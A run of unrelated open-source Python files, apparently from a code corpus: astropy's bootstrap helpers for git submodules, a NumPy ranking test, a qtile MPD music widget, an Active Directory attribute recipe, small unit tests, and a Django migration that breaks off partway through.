except _CommandNotFound:
# The git command simply wasn't found; this is most likely the
# case on user systems that don't have git and are simply
# trying to install the package from PyPI or a source
# distribution. Silently ignore this case and simply don't try
# to use submodules
return False
stderr = stderr.strip()
if returncode != 0 and stderr:
# Unfortunately the return code alone cannot be relied on, as
# earlier versions of git returned 0 even if the requested submodule
# does not exist
# This is a warning that occurs in perl (from running git submodule)
# which only occurs with a malformatted locale setting which can
# happen sometimes on OSX. See again
# https://github.com/astropy/astropy/issues/2749
perl_warning = ('perl: warning: Falling back to the standard locale '
'("C").')
if not stderr.strip().endswith(perl_warning):
# Some other unknown error condition occurred
log.warn('git submodule command failed '
'unexpectedly:\n{0}'.format(stderr))
return False
# Output of `git submodule status` is as follows:
#
# 1: Status indicator: '-' for submodule is uninitialized, '+' if
# submodule is initialized but is not at the commit currently indicated
# in .gitmodules (and thus needs to be updated), or 'U' if the
# submodule is in an unstable state (i.e. has merge conflicts)
#
# 2. SHA-1 hash of the current commit of the submodule (we don't really
# need this information but it's useful for checking that the output is
# correct)
#
# 3. The output of `git describe` for the submodule's current commit
# hash (this includes for example what branches the commit is on) but
# only if the submodule is initialized. We ignore this information for
# now
_git_submodule_status_re = re.compile(
'^(?P<status>[+-U ])(?P<commit>[0-9a-f]{40}) '
'(?P<submodule>\S+)( .*)?$')
# The stdout should only contain one line--the status of the
# requested submodule
m = _git_submodule_status_re.match(stdout)
if m:
# Yes, the path *is* a git submodule
self._update_submodule(m.group('submodule'), m.group('status'))
return True
else:
log.warn(
'Unexpected output from `git submodule status`:\n{0}\n'
'Will attempt import from {1!r} regardless.'.format(
stdout, self.path))
return False
def _check_submodule_no_git(self):
"""
Like ``_check_submodule_using_git``, but simply parses the .gitmodules file
to determine if the supplied path is a git submodule, and does not exec any
subprocesses.
This can only determine if a path is a submodule--it does not perform
updates, etc. This function may need to be updated if the format of the
.gitmodules file is changed between git versions.
"""
gitmodules_path = os.path.abspath('.gitmodules')
if not os.path.isfile(gitmodules_path):
return False
# This is a minimal reader for gitconfig-style files. It handles a few of
# the quirks that make gitconfig files incompatible with ConfigParser-style
# files, but does not support the full gitconfig syntax (just enough
# needed to read a .gitmodules file).
gitmodules_fileobj = io.StringIO()
# Must use io.open for cross-Python-compatible behavior wrt unicode
with io.open(gitmodules_path) as f:
for line in f:
# gitconfig files are more flexible with leading whitespace; just
# go ahead and remove it
line = line.lstrip()
# comments can start with either # or ;
if line and line[0] in (':', ';'):
continue
gitmodules_fileobj.write(line)
gitmodules_fileobj.seek(0)
cfg = RawConfigParser()
try:
cfg.readfp(gitmodules_fileobj)
except Exception as exc:
log.warn('Malformatted .gitmodules file: {0}\n'
'{1} cannot be assumed to be a git submodule.'.format(
exc, self.path))
return False
for section in cfg.sections():
if not cfg.has_option(section, 'path'):
continue
submodule_path = cfg.get(section, 'path').rstrip(os.sep)
if submodule_path == self.path.rstrip(os.sep):
return True
return False
def _update_submodule(self, submodule, status):
if status == ' ':
# The submodule is up to date; no action necessary
return
elif status == '-':
if self.offline:
raise _AHBootstrapSystemExit(
"Cannot initialize the {0} submodule in --offline mode; "
"this requires being able to clone the submodule from an "
"online repository.".format(submodule))
cmd = ['update', '--init']
action = 'Initializing'
elif status == '+':
cmd = ['update']
action = 'Updating'
if self.offline:
cmd.append('--no-fetch')
elif status == 'U':
raise _AHBootstrapSystemExit(
'Error: Submodule {0} contains unresolved merge conflicts. '
'Please complete or abandon any changes in the submodule so that '
'it is in a usable state, then try again.'.format(submodule))
else:
log.warn('Unknown status {0!r} for git submodule {1!r}. Will '
'attempt to use the submodule as-is, but try to ensure '
'that the submodule is in a clean state and contains no '
'conflicts or errors.\n{2}'.format(status, submodule,
_err_help_msg))
return
err_msg = None
cmd = ['git', 'submodule'] + cmd + ['--', submodule]
log.warn('{0} {1} submodule with: `{2}`'.format(
action, submodule, ' '.join(cmd)))
try:
log.info('Running `{0}`; use the --no-git option to disable git '
'commands'.format(' '.join(cmd)))
returncode, stdout, stderr = run_cmd(cmd)
except OSError as e:
err_msg = str(e)
else:
if returncode != 0:
err_msg = stderr
if err_msg is not None:
log.warn('An unexpected error occurred updating the git submodule '
'{0!r}:\n{1}\n{2}'.format(submodule, err_msg,
_err_help_msg))
class _CommandNotFound(OSError):
"""
An exception raised when a command run with run_cmd is not found on the
system.
"""
def run_cmd(cmd):
"""
Run a command in a subprocess, given as a list of command-line
arguments.
Returns a ``(returncode, stdout, stderr)`` tuple.
"""
try:
p = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE)
# XXX: May block if either stdout or stderr fill their buffers;
# however for the commands this is currently used for that is
# unlikely (they should have very brief output)
stdout, stderr = p.communicate()
except OSError as e:
if DEBUG:
raise
if e.errno == errno.ENOENT:
msg = 'Command not found: `{0}`'.format(' '.join(cmd))
raise _CommandNotFound(msg, cmd)
else:
raise _AHBootstrapSystemExit(
'An unexpected error occurred when running the '
'`{0}` command:\n{1}'.format(' '.join(cmd), str(e)))
# Can fail of the default locale is not configured properly. See
# https://github.com/astropy/astropy/issues/2749. For the purposes under
# consideration 'latin1' is an acceptable fallback.
try:
stdio_encoding = locale.getdefaultlocale()[1] or 'latin1'
except ValueError:
# Due to an OSX oddity locale.getdefaultlocale() can also crash
# depending on the user's locale/language settings. See:
# http://bugs.python.org/issue18378
stdio_encoding = 'latin1'
# Unlikely to fail at this point but even then let's be flexible
if not isinstance(stdout, _text_type):
stdout = stdout.decode(stdio_encoding, 'replace')
if not isinstance(stderr, _text_type):
stderr = stderr.decode(stdio_encoding, 'replace')
return (p.returncode, stdout, stderr)
def _next_version(version):
"""
Given a parsed version from pkg_resources.parse_version, returns a new
version string with the next minor version.
Examples
========
>>> _next_version(pkg_resources.parse_version('1.2.3'))
'1.3.0'
"""
if hasattr(version, 'base_version'):
# New version parsing from setuptools >= 8.0
if version.base_version:
parts = version.base_version.split('.')
else:
parts = []
else:
parts = []
for part in version:
if part.startswith('*'):
break
parts.append(part)
parts = [int(p) for p in parts]
if len(parts) < 3:
parts += [0] * (3 - len(parts))
major, minor, micro = parts[:3]
return '{0}.{1}.{2}'.format(major, minor + 1, 0)
class _DummyFile(object):
"""A noop writeable object."""
errors = '' # Required for Python 3.x
encoding = 'utf-8'
def write(self, s):
pass
def flush(self):
pass
@contextlib.contextmanager
def _verbose():
yield
@contextlib.contextmanager
def _silence():
"""A context manager that silences sys.stdout and sys.stderr."""
old_stdout = sys.stdout
old_stderr = sys.stderr
sys.stdout = _DummyFile()
sys.stderr = _DummyFile()
exception_occurred = False
try:
yield
except:
exception_occurred = True
# Go ahead and clean up so that exception handling can work normally
sys.stdout = old_stdout
sys.stderr = old_stderr
raise
if not exception_occurred:
sys.stdout = old_stdout
sys.stderr = old_stderr
_err_help_msg = """
If the problem persists consider installing astropy_helpers manually using pip
(`pip install astropy_helpers`) or by manually downloading the source archive,
extracting it, and installing by running `python setup.py install` from the
root of the extracted source code.
"""
class _AHBootstrapSystemExit(SystemExit):
def __init__(self, *args):
if not args:
msg = 'An unknown problem occurred bootstrapping astropy_helpers.'
else:
msg = args[0]
msg += '\n' + _err_help_msg
super(_AHBootstrapSystemExit, self).__init__(msg, *args[1:])
BOOTSTRAPPER = _Bootstrapper.main()
def use_astropy_helpers(**kwargs):
"""
Ensure that the `astropy_helpers` module is available and is importable.
This supports automatic submodule initialization if astropy_helpers is
included in a project as a git submodule, or will download it from PyPI if
necessary.
Parameters
----------
path : str or None, optional
A filesystem path relative to the root of the project's source code
that should be added to `sys.path` so that `astropy_helpers` can be
imported from that path.
If the path is a git submodule it will automatically be initialized
and/or updated.
The path may also be to a ``.tar.gz`` archive of the astropy_helpers
source distribution. In this case the archive is automatically
unpacked and made temporarily available on `sys.path` as a ``.egg``
archive.
If `None` skip straight to downloading.
download_if_needed : bool, optional
If the provided filesystem path is not found an attempt will be made to
download astropy_helpers from PyPI. It will then be made temporarily
available on `sys.path` as a ``.egg`` archive (using the
``setup_requires`` feature of setuptools. If the ``--offline`` option
is given at the command line the value of this argument is overridden
to `False`.
index_url : str, optional
If provided, use a different URL for the Python package index than the
main PyPI server.
use_git : bool, optional
If `False` no git commands will be used--this effectively disables
support for git submodules. If the ``--no-git`` option is given at the
command line the value of this argument is overridden to `False`.
auto_upgrade : bool, optional
By default, when installing a package from a non-development source
distribution ah_boostrap will try to automatically check for patch
releases to astropy-helpers on PyPI and use the patched version over
any bundled versions. Setting this to `False` will disable that
functionality. If the ``--offline`` option is given at the command line
the value of this argument is overridden to `False`.
offline : bool, optional
If `False` disable all actions that require an internet connection,
including downloading packages from the package index and fetching
updates to any git submodule. Defaults to `True`.
"""
global BOOTSTRAPPER
config = BOOTSTRAPPER.config
config.update(**kwargs)
# Create a new bootstrapper with the updated configuration and run it
BOOTSTRAPPER = _Bootstrapper(**config)
BOOTSTRAPPER.run()
|
adrn/SFD
|
ah_bootstrap.py
|
Python
|
mit
| 36,850
|
# -*- coding: utf-8 -*-
"""
Created on 2017-8-8
@author: cheng.li
"""
import unittest
import numpy as np
import pandas as pd
from alphamind.data.rank import rank
class TestRank(unittest.TestCase):
def setUp(self):
self.x = np.random.randn(1000, 1)
self.groups = np.random.randint(0, 10, 1000)
def test_rank(self):
data_rank = rank(self.x)
sorted_array = np.zeros_like(self.x)
for i in range(self.x.shape[0]):
for j in range(self.x.shape[1]):
sorted_array[int(data_rank[i, j]), j] = self.x[i, j]
arr_diff = np.diff(sorted_array, axis=0)
np.testing.assert_array_less(0, arr_diff)
def test_rank_with_groups(self):
data = pd.DataFrame(data={'raw': self.x.tolist()}, index=self.groups)
data['rank'] = rank(data['raw'].values, groups=data.index)
groups = dict(list(data['rank'].groupby(level=0)))
ret = []
for index in range(10):
ret.append(groups[index].values)
ret = np.concatenate(ret).reshape(-1, 1)
expected_rank = data['raw'].groupby(level=0).apply(
lambda x: x.values.argsort(axis=0).argsort(axis=0))
expected_rank = np.concatenate(expected_rank).reshape(-1, 1)
np.testing.assert_array_equal(ret, expected_rank)
|
wegamekinglc/alpha-mind
|
alphamind/tests/data/test_rank.py
|
Python
|
mit
| 1,317
|
# -*- coding: utf-8 -*-
# Copyright (c) 2010 matt
# Copyright (c) 2010 Dieter Plaetinck
# Copyright (c) 2010, 2012 roger
# Copyright (c) 2011-2012 Florian Mounier
# Copyright (c) 2011 Mounier Florian
# Copyright (c) 2011 Timo Schmiade
# Copyright (c) 2012 Mikkel Oscar Lyderik
# Copyright (c) 2012, 2014 Tycho Andersen
# Copyright (c) 2012 Craig Barnes
# Copyright (c) 2013 Tao Sauvage
# Copyright (c) 2013 Tom Hunt
# Copyright (c) 2014 Justin Bronder
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# depends on python-mpd
# TODO: check if UI hangs in case of network issues and such
# TODO: some kind of templating to make shown info configurable
# TODO: best practice to handle failures? just write to stderr?
from __future__ import division
import re
import time
import mpd
from .. import utils, pangocffi
from . import base
from libqtile.log_utils import logger
class Mpd(base.ThreadPoolText):
"""A widget for the Music Player Daemon (MPD)
Initialize the widget with the following parameters
Parameters
==========
host :
host to connect to
port :
port to connect to
password :
password to use
fmt_playing :
format string to display when playing/paused
fmt_stopped :
format strings to display when stopped
msg_nc :
which message to show when we're not connected
do_color_progress :
whether to indicate progress in song by altering message color
width :
A fixed width, or bar.CALCULATED to calculate the width automatically
(which is recommended).
"""
orientations = base.ORIENTATION_HORIZONTAL
defaults = [
("foreground_progress", "ffffff", "Foreground progress colour"),
('reconnect', False, 'attempt to reconnect if initial connection failed'),
('reconnect_interval', 1, 'Time to delay between connection attempts.'),
('update_interval', 0.5, 'Update Time in seconds.')
]
# TODO: have this use our config framework
def __init__(self, host='localhost', port=6600,
password=False, fmt_playing="%a - %t [%v%%]",
fmt_stopped="Stopped [%v%%]", msg_nc='Mpd off',
do_color_progress=True, **config):
super(Mpd, self).__init__(msg_nc, **config)
self.host = host
self.port = port
self.password = password
self.fmt_playing, self.fmt_stopped = fmt_playing, fmt_stopped
self.msg_nc = msg_nc
self.do_color_progress = do_color_progress
self.inc = 2
self.add_defaults(Mpd.defaults)
self.client = mpd.MPDClient()
self.connected = False
self.stop = False
def finalize(self):
self.stop = True
if self.connected:
try:
# The volume settings is kind of a dirty trick. There doesn't
# seem to be a decent way to set a timeout for the idle
# command. Therefore we need to trigger some events such that
# if poll() is currently waiting on an idle event it will get
# something so that it can exit. In practice, I can't tell the
# difference in volume and hopefully no one else can either.
self.client.volume(1)
self.client.volume(-1)
self.client.disconnect()
except:
pass
base._Widget.finalize(self)
def connect(self, quiet=False):
if self.connected:
return True
try:
self.client.connect(host=self.host, port=self.port)
except Exception:
if not quiet:
logger.exception('Failed to connect to mpd')
return False
if self.password:
try:
self.client.password(self.password)
except Exception:
logger.warning('Authentication failed. Disconnecting')
try:
self.client.disconnect()
except Exception:
pass
self.connected = True
return True
def _configure(self, qtile, bar):
super(Mpd, self)._configure(qtile, bar)
self.layout = self.drawer.textlayout(
self.text,
self.foreground,
self.font,
self.fontsize,
self.fontshadow,
markup=True
)
def to_minutes_seconds(self, stime):
"""Takes an integer time in seconds, transforms it into
(HH:)?MM:SS. HH portion is only visible if total time is greater
than an hour.
"""
if type(stime) != int:
stime = int(stime)
mm = stime // 60
ss = stime % 60
if mm >= 60:
hh = mm // 60
mm = mm % 60
rv = "{}:{:02}:{:02}".format(hh, mm, ss)
else:
rv = "{}:{:02}".format(mm, ss)
return rv
def get_artist(self):
return self.song['artist']
def get_album(self):
return self.song['album']
def get_elapsed(self):
elapsed = self.status['time'].split(':')[0]
return self.to_minutes_seconds(elapsed)
def get_file(self):
return self.song['file']
def get_length(self):
return self.to_minutes_seconds(self.song['time'])
def get_number(self):
return str(int(self.status['song']) + 1)
def get_playlistlength(self):
return self.status['playlistlength']
def get_status(self):
n = self.status['state']
if n == "play":
return "->"
elif n == "pause":
return "||"
elif n == "stop":
return "[]"
def get_longstatus(self):
n = self.status['state']
if n == "play":
return "Playing"
elif n == "pause":
return "Paused"
elif n == "stop":
return "Stopped"
def get_title(self):
return self.song['title']
def get_track(self):
# This occasionally has leading zeros we don't want.
return str(int(self.song['track'].split('/')[0]))
def get_volume(self):
return self.status['volume']
def get_single(self):
if self.status['single'] == '1':
return '1'
else:
return '_'
def get_repeat(self):
if self.status['repeat'] == '1':
return 'R'
else:
return '_'
def get_shuffle(self):
if self.status['random'] == '1':
return 'S'
else:
return '_'
formats = {
'a': get_artist, 'A': get_album, 'e': get_elapsed,
'f': get_file, 'l': get_length, 'n': get_number,
'p': get_playlistlength, 's': get_status, 'S': get_longstatus,
't': get_title, 'T': get_track, 'v': get_volume, '1': get_single,
'r': get_repeat, 'h': get_shuffle, '%': lambda x: '%',
}
def match_check(self, m):
try:
return self.formats[m.group(1)](self)
except KeyError:
return "(nil)"
def do_format(self, string):
return re.sub("%(.)", self.match_check, string)
def _get_status(self):
playing = self.msg_nc
try:
self.status = self.client.status()
self.song = self.client.currentsong()
if self.status['state'] != 'stop':
text = self.do_format(self.fmt_playing)
if (self.do_color_progress and
self.status and
self.status.get('time', None)):
elapsed, total = self.status['time'].split(':')
percent = float(elapsed) / float(total)
progress = int(percent * len(text))
playing = '<span color="%s">%s</span>%s' % (
utils.hex(self.foreground_progress),
pangocffi.markup_escape_text(text[:progress]),
pangocffi.markup_escape_text(text[progress:])
)
else:
playing = pangocffi.markup_escape_text(text)
else:
playing = self.do_format(self.fmt_stopped)
except Exception:
logger.exception('Mpd error on update')
return playing
def poll(self):
was_connected = self.connected
if not self.connected:
if self.reconnect:
while not self.stop and not self.connect(quiet=True):
time.sleep(self.reconnect_interval)
else:
return
if self.stop:
return
if was_connected:
try:
self.client.send_idle()
self.client.fetch_idle()
except mpd.ConnectionError:
self.client.disconnect()
self.connected = False
return self.msg_nc
except Exception:
logger.exception('Error communicating with mpd')
self.client.disconnect()
return
return self._get_status()
def button_press(self, x, y, button):
if not self.connect():
return False
try:
status = self.client.status()
if button == 3:
if not status:
self.client.play()
else:
self.client.pause()
elif button == 4:
self.client.previous()
elif button == 5:
self.client.next()
elif button == 8:
if status:
self.client.setvol(
max(int(status['volume']) - self.inc, 0)
)
elif button == 9:
if status:
self.client.setvol(
min(int(status['volume']) + self.inc, 100)
)
except Exception:
logger.exception('Mpd error on click')
|
dequis/qtile
|
libqtile/widget/mpdwidget.py
|
Python
|
mit
| 11,020
|
import win32com,win32com.client
def ad_dict(ldap_path,value_required=1):
attr_dict={}
adobj=win32com.client.GetObject(ldap_path)
schema_obj=win32com.client.GetObject(adobj.schema)
for i in schema_obj.MandatoryProperties:
value=getattr(adobj,i)
if value_required and value==None: continue
attr_dict[i]=value
for i in schema_obj.OptionalProperties:
value=getattr(adobj,i)
if value_required and value==None: continue
attr_dict[i]=value
return attr_dict
user='LDAP://cn=fred123,OU=people,DC=company,DC=com'
print ad_dict(user)
|
ActiveState/code
|
recipes/Python/303348_Get_attributes_object_MS_Active/recipe-303348.py
|
Python
|
mit
| 575
|
import unittest
from copernicus import Event
__author__ = 'gronostaj'
class EventTests(unittest.TestCase):
event = Event('test', '0101____')
def test_should_extract_argument_correctly(self):
min_ = EventTests.event.extract_arg('01010000')
max_ = EventTests.event.extract_arg('01011111')
self.assertEqual(min_, 0)
self.assertEqual(max_, 15)
def test_should_translate_argument_correctly(self):
event = Event('test', '0101____', lambda v: 2 * v + 5)
for x in (0, 2, 10):
self.assertEqual(event.transform(x), x * 2 + 5)
def test_should_error_when_extracting_with_non_matching_mask(self):
with self.assertRaises(ValueError):
EventTests.event.extract_arg('11111111')
def test_should_fail_extraction_on_invalid_input(self):
with self.assertRaises(Exception):
EventTests.event.extract_arg('22222222')
|
gronostajo/copernicus-api
|
tests/testEvent.py
|
Python
|
mit
| 921
|
# Generated by Django 2.2.24 on 2021-06-16 18:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('assays', '0047'),
]
operations = [
migrations.AlterField(
model_name='assaycategory',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaycategory',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaycategory',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaycategory_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipreadout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipreadout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychipsetup',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychipsetup_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaychiptestresult',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaychiptestresult_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatafileupload',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydatafileupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydatapoint',
name='subtarget',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssaySubtarget', verbose_name='Subtarget'),
),
migrations.AlterField(
model_name='assaydataupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydataupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaydataupload',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaydataupload_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayfailurereason',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayfailurereason_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaylayout',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaylayout_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrix',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrix_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='failure_reason',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssayFailureReason', verbose_name='Failure Reason'),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='group',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='assays.AssayGroup', verbose_name='Group'),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymatrixitem',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymatrixitem_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymeasurementtype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymeasurementtype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymethod_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymethod',
name='supplier',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, to='assays.AssaySupplier', verbose_name='Supplier'),
),
migrations.AlterField(
model_name='assaymodel',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodel',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodel',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodel_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assaymodeltype',
name='signed_off_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assaymodeltype_signed_off_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='created_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_created_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='description',
field=models.CharField(default='file added - 20210616-14:45:48', help_text='A description of the data being uploaded in this file (e.g., "Treated vrs Control" or "Treated with 1uM Calcifidiol".', max_length=2000, verbose_name='Data Description'),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='modified_by',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='assayomicdatafileupload_modified_by', to=settings.AUTH_USER_MODEL),
),
migrations.AlterField(
model_name='assayomicdatafileupload',
name='signed_off_by',
